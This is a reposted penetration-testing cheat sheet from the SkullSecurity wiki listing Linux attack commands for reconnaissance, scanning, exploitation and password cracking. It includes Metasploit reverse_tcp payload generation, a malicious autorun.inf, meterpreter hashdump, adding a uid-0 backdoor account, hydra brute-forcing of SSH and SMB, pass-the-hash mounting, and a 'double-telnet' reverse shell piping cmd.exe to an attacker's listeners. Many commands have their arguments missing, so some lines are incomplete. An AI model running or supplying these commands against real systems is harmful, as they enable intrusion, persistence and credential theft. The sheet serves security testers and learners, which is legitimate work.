skullsecurity作者常用的一些linux命令

https://wiki.skullsecurity.org/index.php?title=Linux_Commands

whois

$ whois [-h whois_server] name

nslookup

$ nslookup 

dig

• Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV

$ dig [@server]  [type]

• Zone transfer

$ dig [@server]  -t AXFR

• Iterative zone transfer

$ dig [@server]  -t IXFR=

BiLE.pl

$ ./BiLE  
$ ./BiLE-weigh.pl  
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

snmpwalk

Dump the ARP table of an snmp server at HOST

$ snmpwalk -v 2c -c   ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

• -n -- use numbers

• -i

• -v -- be verbose

• -r /-w -- read from/write to file

• -x -- print hex

• -A -- print ASCII

• -X -- print hex and ASCII

• -s -- length to capture (-s0 for all data)

Filter string

• Protocol

• ether, ip, ip6, arp, rarp, tcp, udp

• Type

• host

• net

• port

• portrange

• Direction

• src

• dst

• Logic

• and

• or

• Show TCP against target 10.10.10.10 in ASCII

tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10

• Show all UDP from 10.10.10.10

tcpdump [-i tap0] -n udp and src 10.10.10.10

• Show all TCP port 80 packets going to or from host 10.10.10.10

tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

• --syn, --fin, --rst, --push, --ack, --urg

Target selection

• --rand-dest

• --interface

Source selection

• --spoof

• --rand-source

Port selection

• --destport

• --destport + -- increment by one for each packet received

• --destport ++ -- increment by one for each packet sent

• --scan

• --baseport

• --keep -- don't increment the source port

Speed options

• --fast, --faster, --flood

• --interval -- interval in seconds

• --interval u -- interval in microseconds

Other options

• --count

• --beep

• --file

• --data

traceroute

Parameters

• -f -- Initial TTL

• -g -- Loose source route

• -I -- use ICMP Echo instead of UDP

• -m -- maximum number of hops (default 30)

• -n -- numeric

• -p -- set the base UDP port

• -w -- wait N seconds (default 5)

Layer Four Traceroute (lft)

http://pwhois.org/lft/index.who

Options

• -u -- use UDP

• -p -- use ICMP echo

• -d -- destination port (default 80)

• -s -- source port

• -L -- length (including layer 3/4 header)

• -A -- look up AS number

• -P -- traceroute via tcp

nmap

Pinging

• -PN -- don't ping

• -PB -- default, ICMP Echo + TCP to port 80

• -PE -- ICMP Echo request

• -PS[portlist] -- TCP SYN

• -PP -- ICMP Timestamp request

• -PM -- ICMP Address Mask request

• -PR -- default on subnet, use ARP to identify hosts

Scanning

• -sT -- TCP Connect scan

• -sS -- SYN scan

• -sA -- ACK scan

• -sF -- FIN scan

• -sN -- Null scan

• -sX -- Xmas Tree scan

• -sM -- Maimon scan

• --scanflags specify your own flags

• -sU -- UDP scan

Fingerprinting

• -O -- OS fingerprint

• -sV -- Version scan

Scripts

• -sC -- run all scripts

• --script=

• --script-trace

Timing

• --paranoid, --sneaky, --polite, --normal, --aggressive, --insane

• --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay

Other options

• -p

• -F -- fast (checks only ports in nmap-services)

• --packet-trace

• --traceroute

• --badsum

THC amap

Options

• -q -- quiet (omit closed ports)

• -v -- verbose

• -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd

$ finger

$ who

$ w

Remotely:

$ finger @

Exploitation

netcat

Options

• -l -- listen mode

• -L -- listen harder (Windows only)

• -u -- UDP mode

• -p -- local port (in listen mode, the port to listen on)

• -e -- program to execute

• -n -- don't resolve names

• -z -- don't send any data

• -w -- timeout for connects

• -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1  

Setting up a relay

mknod backpipe p
nc -l -p  < backpipe | nc   > backpipe

Relaying port 22 to the local system

mknod backpipe p
nc -l -p  < backpipe | nc localhost 22 > backpipe

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print

find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print

for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done

Metasploit

Running an exploit

msf> show exploits
msf> use exploit/windows/smf/ms05_039_php
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions

msf> sessions -l
msf> sessions -i 

Creating a malicious VBScript

$ msfpayload windows/meterpreter/reverse_tcp LHOST= V
$ msfpayload windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=y V

Creating a malicious Exe

$ msfpayload windows/meterpreter/reverse_tcp LHOST= X
$ msfpayload windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=y X

Example autorun.inf file to run a malicious exe (goes with Metasploit)

[autorun]
open=example.exe
icon=example.exe

Metasploit listener

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=y E

Meterpreter

Filesystem commands

> cd
> lcd 
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl  

Modules

> use 
> use priv
> hashdump
> timestomp

Creating a user

Adding an ordinary user

useradd 

Adding a root user (note: a non-uid-0 account may be required to log in)

useradd -o -u 0 

telnet

Checking for inetd/xinetd

ps aux | grep inetd

Adding telnet to /etc/inetd

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Adding telnet to xinetd

• Steal the file from a service that's running (files are in /etc/xinetd.d)

• Change server to "/usr/sbin/in.telnetd"

Restarting inetd/xinetd (the "kill" command with the PID can also be used)

killall -HUP inetd
killall -HUP xinetd

sshd

File should be in /etc/rc*. Ways to enable:

chkconfig sshd on
service sshd start
/etc/init.d/sshd start

Passwords

Dictionaries

Creating a dictionary

cat wordlist.txt | sort | uniq > dictionary.txt

Scraping a Web site

mkdir /tmp/source
cd /tmp/source
wget -r -l  
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst

Or, just use my dictionaries

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

pw-inspector

Options

• -i -- input file

• -o -- output file

• -m -- minimum length

• -M -- maximum length

• -c -- the number of criteria

• -l -- lower case

• -u -- upper case

• -n -- numbers

• -p -- printable characters (lower/upper/num)

• -s -- special characters (all others)

Example

cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2

Hydra

Options

• -l /-L -- Login name/file

• -p /-P -- Password/file

• -e -- extended checks (n = null, s = same as username)

• -t -- thread count

hydra   <-l |-L > <-p |-P > [-e ] [-t ]

smb password

hydra  smb -l george -P ./list.lst -e ns

ssh password

hydra  ssh2 -l george -P ./list.lst -e ns

John

Show cracked passwords

john --show 

Speed test

john --test

Running against a password file

john 

Specifying type type

john --format= 
john --format=nt /tmp/pwdump

Combining passwd/shadow

unshadow   > combined.txt
john combined.txt

Modified Samba

Loading the hash

export SMBHASH=":"
echo $SMBHASH

Mounting a drive

./smbmount ///  -o username=
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

Adding a user

./net user ADD   -I  -U 
./net rpc group ADDMEM administrators  -I  -U 

Web

nikto.pl

Scanning

nikto.pl -h 

Updating

nikto.pl -update

Single check

nikto.pl -Single

Fancy tricks

Double-telnet

On the attacker machine

nc -l -p 4444
nc -l -p 5555

On the victim machine

telnet  4444 | cmd.exe | telnet  5555